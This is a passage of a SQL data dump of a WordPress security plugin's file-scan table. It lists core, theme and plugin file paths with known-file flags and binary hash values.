�\0���\Z�̿�','|�?b~����ڬ��(�ʹ׺;l�G9��','',0,'?'),('�I�s̖��6��oۜ��','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�LZ���&��4��','����A !k�p(�֞Y��m�^äzTe_����','',0,'?'),('�N\"�,�_�	3���B�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-misc-options-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�B���4�H׫','i�썚<X�\'hw�4E�u�*\\���xQ��7�','',0,'?'),('�Z7��g���2�D��','wp-content/themes/city-store/page-templates/gallery-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y]��e2�j�Hc��','����-�gT�j�d�����A�N�|#;��o��\r}','',0,'?'),('�a�ͮ�(�o��:`','wp-content/plugins/wp-cerber/assets/flags/dm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�<�-�.��w','��h*W̕|l�0jhWp:���z��[V,','',0,'?'),('�bv��E��H���΄','wp-includes/js/wp-lists.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M4���KYs:��ȫ�','󩶓����Z-3w�Eї\rqK]��3�]��.X','',0,'?'),('�f\n���]��IԘk','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-select-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��~&�����\n��G','�Z�\"Et�o�TK@NB5�!��Ϣp�d','',0,'?'),('�hS����:���`','wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�+C#+|�fZ���]�','kn\Zy�&��_��[��Igl�(�g\'�^�G','',0,'?'),('�l�f���tQ���','wp-content/themes/skt-pathway/images/free-vs-pro.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O^ơ1\r�Qs%�\n��','�t��p�Sx�\0us�fO셝��`�Ö','',0,'?'),('�a�J�,�Hb��lQ>','wp-content/themes/weblog/template-parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\��������','-Rx�v�W��$z�3�9F`�G#�wr-V,���F','',0,'?'),('��_䎯�Ⳇz�\0�','wp-content/themes/graduate/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(y��	���R��tB','��S�!�+I��o�M3�|����yI�T+���','',0,'?'),('��(_x\r����1��','wp-content/themes/advance/images/sep-shadow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�0Qһ��:4,��','~4�\\-��;1ĩ\0�)A��H㗽dp\\�','',0,'?'),('�����[0���4��','wp-content/themes/enigma/css/theme-animtae.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Apw���;�','��=Y��:Z.���م\0J��tbjI�S�R','',0,'?'),('���5ȇj����4*H','wp-content/themes/newsmag/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_��\\���$[���?��','E6�����vo�]���բ����<��J����','',0,'?'),('����~��>I,�','wp-content/themes/singularity/taxonomy-download_tag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@	��qv�3�,���','���\"�K�0p`�[oKE�߳��������','',0,'?'),('���>˓�;�ͷ�;xB�','wp-content/themes/advance/inc/kirki/assets/scss/panels/expanded.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yj��w��J:J|��','�B�2��锳§�lyk(��G����','',0,'?'),('����lzPw{e','wp-content/themes/advance/inc/kirki/assets/scss/controls/dimension.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٗ@ȡU�6��<�','%�\'���v�u���[�� ʁ����#��i=�','',0,'?'),('��(�K�-�|qޞ�]��','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-radio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|���Z��P��tyf','�{p��۹�\0�YںC8h3$�~z�d����','',0,'?'),('���&��N�,���6P','wp-admin/images/icons32-vs-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*04�G4F�	&Z�i}\"','�.a�}��hw�6�WEʭ�(3�Jӭ�9�E�','',0,'?'),('�κ\"y����~��_','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/typography.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�~k���F���q�','�{U�L��u~ZV���5�������$�DR�','',0,'?'),('�д��\0N莦v�\n=t','wp-content/plugins/wp-cerber/assets/flags/cz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cR��}S������J�','�m*1\"�vl�ř:\\��f����?.�؟i��\0�','',0,'?'),('��v��#q���ȃ�','wp-includes/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EOxٕX�2떭؃','x��aJN�!e���\"\"Nq�}�AMC�1)��{�j','',0,'?'),('��t�\r�Q7��vLj��','wp-content/themes/skt-pathway/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oW�v�g\n8�Fӕ\"','{ܭ/����&���\Z��=�l�d;q����>w','',0,'?'),('��W31��N���gפ��','wp-includes/js/dist/vendor/react.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jB���e�}����\"\Z','�g��+_u<!�\'��[��N�b�r��c�>;','',0,'?'),('��8&k��]�P��/�m','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/yaml/yaml.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��N�8`����O�','��܌���h)I-�Dm�sR4�U�xd�F�A�','',0,'?'),('��ib?�/�2�Q �B','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/haml/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̽�@)��j�����','Ǒ�(8�y[��8w�����O��8$\"�����','',0,'?'),('��x[�e��>M�','wp-admin/includes/edit-tag-messages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m-I�f3�f\\Z��','u�-h�yjL��!z�V���-1�nyFY�Ý�&�','',0,'?'),('�������1�!��N','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�\"�3�8?�F�NxA��','wp-content/themes/simpleshift/parts/companion/frontpage-featured.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b��2�����R�&','�0��N�vj���+ʘ��\n:�W��a8�%��/�','',0,'?'),('�<��2��O�fe�~[','wp-content/themes/Kent/guide.php',0,'�F��ɇ&�\r���&','�F��ɇ&�\r���&','�M�Ò��ӚiWD���y˺�\Z鷹�K�$�z','',0,'?'),('�A��x�(�O�n=(�8','wp-content/themes/authorize/assets/stylesheets/font-awesome/scss/_screen-reader.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�G���Uh�o�','�1�4<6�ԇ����&�V�N�㋂���ء��','',0,'?'),('�R,�\0o`v��s�G�','wp-content/themes/brickyard/images/icon-category.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�l�|��\0��YV(','�	�)6���-�x}���^�h+\nFv��B��','',0,'?'),('�q�h���Bc�92��','wp-admin/network/site-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bh@�Uj՟���G��\'{','9;#���l+��9���\"��p�LŢ�ۈ�|','',0,'?'),('�t�y��N�n�/l�2�','wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-fonts-google.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���	�� �-�<�c�','����\\�u*r��s�r�\n\\W>��]�cPHl','',0,'?'),('�{�5\n��r��}��','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-radio-buttonset-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����1��f5{��g','js/�/8�0��,��|b�@��	B\"�.�*�O�','',0,'?'),('����=K����h�R2','wp-content/themes/hitmag/inc/kirki/includes/class-kirki-init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�y�䦦���*i�','��~�S��j���,F�tn���	pqk�=o�?�','',0,'?'),('���\\F�Z�7i�','wp-content/themes/twentynineteen/sass/site/primary/_comments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�\0\0�P�qSqUь�','�n�BEqO�Ȉ����}]��� ��ULryi��','',0,'?'),('�� �����I�O7','wp-content/themes/catch-flames/css/genericons/Genericons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s/�n]�d���z�?','�*���SW����.��~5t�=���V�p̦�','',0,'?'),('���I:�.�X�<��!�','wp-content/themes/twentytwenty/assets/images/2020-square-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��4(��|���&�','�`�z�z�Y`]���3��)�]:a>�?oez��','',0,'?'),('��n1.Óu�t���lX','wp-admin/css/colors/modern/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+@}�����nf\Z��E','Xi� t���j<u&����%C�\rA��\0�6!�','',0,'?'),('��w}o�h�=<C���H','wp-content/themes/catch-flames/images/demo/featured4-350x263.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v?VkMDT�B�_��j:','!Ch��Z�B�F�3�Pg;�2��AEU��\'�','',0,'?'),('����`%��{��+��','wp-content/plugins/wordfence/images/icons/error128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�%7�!��.�','{h\0,�]�z�k�V�{җ�6nG\n�x��s9�','',0,'?'),('�����(\'���v!�-�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/fold/foldgutter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�1��4�-��\0{�','Zz+�OH�	����=����2����6�','',0,'?'),('���v��\\Q���-��','wp-includes/js/tinymce/plugins/hr/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	%>�)���•;��','؃F��S�[k���&�f� 6+�b�>��','',0,'?'),('��t��h�	,Gx�\"M','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��R�N\Zb8M�g�|','{�����R�tH}��ܧYQ��{�F\Z�H�','',0,'?'),('��P}������@�\"�','wp-content/themes/graphene/includes/theme-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�������7���','dRNȑ�^�Ϋ��r�\"L���LQ0��\Z�','',0,'?'),('�ƚ�ŏH�Wn�\'i�','wp-content/plugins/wp-cerber/assets/goo-translate.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�c�\"C�!㋫x�o','�>��Cv^��/�V����r��cCƨK(��P��','',0,'?'),('����Rx>;��]\n�ާ','wp-content/themes/advance/inc/kirki/assets/scss/controls/spacing.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��[�r�X��\n�p','7��\0bH,2�_9��&��=���]$S��T�V�','',0,'?'),('���9�X����U�7�z','wp-content/plugins/wordfence/models/page/wfPage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�bo i�%H��Xw�Xv','ƅ1h�/jw�<U���\\�k�q%s|W�6��','',0,'?'),('��і�q��SGKy(�','wp-includes/kses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>F�ނS\0wt�R��','J�Mv��CkcC^f�`ƨ� S�@`�Uny�+��','',0,'?'),('����\na-h�1�q�`','wp-content/themes/Kent/functions.php',0,'��>㞓W@�cq���-','��>㞓W@�cq���-','Kn��P{��c��Pv�R���c�`���\"TE�','',0,'?'),('��]��:S>Ud!�','wp-content/themes/gambit/css/theme-info.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g���F�U���4','m4�\n!���ţ�N(�5^��Sq����?=2��','',0,'?'),('������3@K{8&Q֗','wp-content/themes/monograph/js/superfish.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�۲.�w�Ju\Z\Z})','���͟�ްj��,՗�2`2���\n˹O�','',0,'?'),('��c�cXRd���','wp-content/themes/twentytwentyone/.stylelintrc-css.json',0,'���%fX٨�=TQ!','���%fX٨�=TQ!','rb�P�Z���#�Ue�xBS�6F셥Կ\\?�','',0,'?'),('�\Z $9)1x��','wp-content/themes/chronus/inc/customizer/sections/customizer-magazine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�d���\'��e�jI','��/ư�ك�(k��cwK�� H��j��u��u�','',0,'?'),('�9��l�ן? r��q�','wp-includes/class-wp-user-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�Iyʰ�BzR��>�O','�gu,�$�bh�/7��C�<�l=��0x�3�x','',0,'?'),('�y�2V���iI�W^�','wp-content/themes/newsmag/assets/vendors/fontawesome/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lL5�@+ou3+ym�S','T<&��C<qᮽ�v�$�e�l�w���/T �','',0,'?'),('�!�)�y�\Z�	�3�','wp-content/themes/simpleshift/assets/images/preview/boat.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']o;�Gh�\'��4p�','. �\Z�D��e���I���������D�','',0,'?'),('�%��?���)�','wp-content/plugins/wordfence/views/common/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w]�Q�V�մi�','��q���r*���-T���N5�\r��Oc;m�a�','',0,'?'),('�3�y赈��F�]�K','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/markdown/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�kfL/������H�','ߖ�h��Ç\Z[ه����9=0�$�Q���','',0,'?'),('�DS���3.įy}�;','wp-admin/images/browser-rtl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D\"��ӠA�\Z����%̝','+啧���0��p�Ɯ��JMk �q�w�Xب�','',0,'?'),('�XB�)\n���&�徼�','wp-content/themes/graphene/includes/theme-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�[�6D���Y��g��|','ިͰi9_��oH�C��}v�q�]/�k\"<�','',0,'?'),('�[��I�$�@�M��9','wp-content/themes/gambit/template-parts/content-small-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X���2Kؿ�����','*����E�>�k�~�c����.�NK�%�','',0,'?'),('�[�Hn[P�.~���FU|','wp-includes/nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(������%��ӯq','?^��в�W�}T{5�3�m�T�:�锟��G','',0,'?'),('�])&>f�4�ODF�`�','wp-content/themes/simpleshift/inc/kirki/assets/js/branding.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�迾��IBꪼg','�\06z=�a����\\��(���GmTꥪ7SQ','',0,'?'),('�c����S)�f>�mh�','wp-content/themes/simpleshift/footer.php',0,'�5m�&8�a��L3�','�5m�&8�a��L3�','�?\'_n�\\#g�0],�r	Dy�m�%Э4�&nX�','',0,'?'),('�i��\\ü���I�b�v','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/selection/selection-pointer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9N�ǒ�T�G=r�qV�','�9�D��+�db�\n��8\ZS�-O�Q>v���','',0,'?'),('�j��\\��Ħ<y�p�','wp-includes/widgets/class-wp-widget-custom-html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���dz\'E�n�N��','��l.��M|yc�)�Vr�]�Ak�:Ʃ\"�A','',0,'?'),('�n��˜�Ө�n�H','wp-content/themes/auberge/assets/js/scripts-global.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','27V8˗}r�8�Bގ�','슯�,�]]�{i�\"�[j�n{�*q�9�+nA(','',0,'?'),('�z���$��I �Ve�','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-filed-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!.ξ�������','13�	�=�>���zk/��&�ڍ|��\ZR�]�','',0,'?'),('�����}��U;Pq�\ZQ','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-code.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�����C~�]=?�','��Hu�r�S��!�㒦\r�r��E��b����','',0,'?'),('����Z�\Zxcy�d��\'','wp-admin/js/language-chooser.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U>�p4J�l��5�=','9���\rX�L�dC5@U���K&>̓l��#�','',0,'?'),('���-�4u��\Zo�','wp-content/plugins/wp-cerber/assets/flags/ye.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t?H&��@\r\r�J�','�~��p��\"&qƝq�*��۔�QV��Y�\\F','',0,'?'),('��[�s::��q��+�','wp-content/themes/twentytwentyone/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q���M\"�BC�	�','���~Բ��+@�w�GՑ.4C�O��iC���','',0,'?'),('���%�I3-�7�','wp-content/themes/twentynineteen/style-editor-customizer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	9�䩠�\"�\0m���','�/} ���	��ԾA9{�!���w���a��.','',0,'?'),('��}ݑ�YfGt��\r[�','wp-content/themes/hemingway/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3+�Ц�q�]��N�','���:h�j��03yr�����RR�n\"^','',0,'?'),('���%���\\(w����&','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Decoder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I\0��$K��  �	','V�p\Z�1͌э�\'=~�ٲ�F_u\\��P�','',0,'?'),('��G^�2G��%�k���','wp-content/plugins/wp-cerber/assets/flags/fr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nFs�{7}X#@�Vؐ','�KCZ��p���YJ\01 ���7aƎ��F�����','',0,'?'),('��Gfir\0�)�|��S','wp-content/plugins/wordfence/css/phpinfo.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��Q���!�0w/�蓴','���a�@|��I\r=\Z^ε�d)�[�����W��','',0,'?'),('�����:x�=�}�','wp-includes/js/jquery/ui/mouse.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J�;��ty����','�G������[&�~ͤ�E3�	�z͟��ӱ�','',0,'?'),('��7�I�ѓ#��>sb�','wp-content/themes/simpleshift/inc/kirki/assets/js/tooltip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�L`CO����rk�','|]��yX�E��G�@��w!2��Ѣ�(','',0,'?'),('��\\+6��h��Sќ�:','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/javascript/javascript.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m;�KG����K��','r\Z�Q���Ϙ	��8���J��a{�>Z`�xG9','',0,'?'),('��C)�VxzϞ�ΩtP','wp-content/plugins/wp-cerber/assets/flags/um.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�xQos:h�\0A�qY','�?85�ϝ��r�o�e��[UԦM��\\','',0,'?'),('��H�a�+����̰I�','wp-content/plugins/wordfence/waf/bootstrap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�%�S�\\!+���d�~','���8���|~�‘1뢇�:�HB�g撚r','',0,'?'),('��;�;/J�KmR��0�','wp-content/plugins/akismet/views/start.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�z�\"\'�\0�\0Y7^kTj','�=P���=�y�p��y�P���*u]����*','',0,'?'),('��O�I��Y�\\�{=�H','wp-includes/robots-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\��líܓM��','^�h��R߻u�ɆCZ11��S���&̊p0','',0,'?'),('��y�&a�A�7�]Dm','wp-content/plugins/wordfence/images/icons/ajaxRed16.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%���B\ng�2��;','D,�A�J���lOS�p�e؇�&���','',0,'?'),('��d��0q�Q��6�}','wp-content/themes/graphene/images/social/skype.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�21��*��_N�N�','��-w)ǥ�\\�����e��oE�G�����w','',0,'?'),('�� \0/a*�\n��ئ','wp-content/themes/simpleshift/inc/kirki/includes/output/property/class-kirki-output-property-font-family.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7(�����D�� q','R&��!���W�. �CPB&ܷm\"D���5�yPM','',0,'?'),('�ƞׅ\ZX�X]�Y�F','wp-includes/js/codemirror/htmlhint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�|џ�G�MtP5��','\0U[\0�M\'mCռ5��5k`����5�ё','',0,'?'),('��J^��o�)�_��','wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.carousel.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�vL���Ju�6�=6�',':Հ�h=��p����˰��CB�Y�=�c','',0,'?'),('����t�O<X-s','wp-content/themes/catch-flames/inc/panel/customizer/upgrade-button/section-pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tQCh��״�PF�t',',\"���H6���D��T�G�U֤�','',0,'?'),('�PB�\n��Z�Y �P�','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-notice-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�21����b���m� ','H���>���@+��q�j(~�]�v`�즃�\'','',0,'?'),('� a\"KwT�bc1S','wp-admin/css/revisions.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǰW��{�jڛ/$��','��j	ELCo�!;u��:�蛜|�|/���3eom','',0,'?'),('�-�[ip��\\^���]','wp-includes/widgets/class-wp-widget-tag-cloud.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x̭&�b�+|eS�݂','�,��ɼ?��?�	p�f\0qO��_���&N9','',0,'?'),('�0�&�Y�������','wp-content/plugins/wordfence/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]_�#D���\0��','\Z ��ے�%�4~N�~Gh!b��:w��Ɍ��\'','',0,'?'),('�2l�Ƴ;���-6�','wp-content/plugins/wp-cerber/modules/aaa-wp-cerber.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3W�T��\r�ط�18��','<�[�7�LĆ9�>gQ�:�56��bW�7��','',0,'?'),('�3!�v\'$��o=zj','wp-content/themes/advance/css/customcss/header_checkbox.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r��ѡu�@-d\"�;','\0�9�P\Z�������bk	\09\'�Z�\r���','',0,'?'),('�4g��e���>���ߝ','wp-admin/images/list-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hջIS�2��i�g�','��J�p�S_��X��#���UB�-z���,�','',0,'?'),('�4�k���4����g*�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/liquibyte.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����`<�IR�IO	�u','����\Z�L�P�`�f%�񰸊K��mz^�0�Z','',0,'?'),('�5x��W�^|3m�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/ambiance.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9��G�(m���Q','�w\n=�Ǐw�+��I?��ʍ\"p	�W��','',0,'?'),('�;��h� $��z\n�U','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-code-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z�1\n���_�K����t','D��慔�H�-���=`�u�~	��dh�|�','',0,'?'),('�;�f�J1��˘��+C','wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�<���^��=�f','s]ѽj$��	��↜������Sk��ik�','',0,'?'),('�OOwT�M\r��Y�!d','wp-includes/js/mediaelement/mediaelement.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-6�������m����','���%�]�cط�Z���7�\n�ԋ���2���','',0,'?'),('�U�R3�� �t�>Er_','wp-content/themes/enigma/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�L\n��~�tH��#�','�����G�>S�߈@�a��w�yk~ #���','',0,'?'),('�\\����J¦��C�n�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/the-matrix.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t���m�)g�/��','`s�v��s�(�*:�����s�uOJ-�z�LN9','',0,'?'),('�]ǿ|������IC�','wp-includes/js/dist/keycodes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!a����	��5/ �','8*�Zu%V��,�3Yb���k־�&) ���E','',0,'?'),('�c����)�>�c\07X�+','wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Iv^���]�:w�O6u','���������<�f\n5�cZ>r;SY.�ˑ�_�','',0,'?'),('�fkj��N�Uei4=%�','wp-admin/js/tags.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�,�yS�h�K=�c','9|Wü��yt�ϝ���]P,is�Ǯ���S7F���','',0,'?'),('�l����X3v�SlS','wp-content/themes/graphene/images/social/diigo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@���C\r�Nl�','h(�*�̷��	�h��N��*\0<�@>���','',0,'?'),('�t�8!5�ޕ�Q�8���','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/paraiso-light.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��sG�yR����','�[��3@x��VX2e�z�8������Q','',0,'?'),('�y%���Ǻ~�ne\"V','wp-admin/css/list-tables-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Rb��q\"�]�+\\','��m>� ��ӵ㿞í��\ZC��(8��(','',0,'?'),('���ӫ:U�]���','wp-content/themes/brickyard/functions/about/images/support.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@4/Z�xr���I(]�','APX�@L�`��gwG��c0W�ŀ�}���c|b','',0,'?'),('��3�MCI��g��\Zl','wp-content/themes/hitmag/inc/kirki/includes/class-kirki-active-callback.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�: ��K��n֨8�B��','5��;�o�cU,Mw늀���>�uT��}/@]*�','',0,'?'),('��q����|X�^#B�','wp-content/themes/auberge/assets/js/vendor/slick.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��л^��/u�^�N','r��TP\07��0]M�M���yw��ٜ�l[.��','',0,'?'),('��\Zv\0��̀Fn8���','wp-content/plugins/wp-cerber/assets/flags/tm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�d&���&����/��','�p�DƱq��ߙcc����D�J�cT5@�U�v\n','',0,'?'),('��bqZ;��1�7��a�','wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-date-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gW�d(Xҁ���','�1���T��j8o�GdL%Y��\nw�2<@B','',0,'?'),('��Ա�w�τ���D5�','wp-content/themes/catch-flames/images/apple-touch-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#w2�l�Vs5Ɔ�','�P3���h�ݸ�u,AF��z(��Pj�P�)M','',0,'?'),('�����?.�*�D3T�','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�KG��75-?T�','��t4 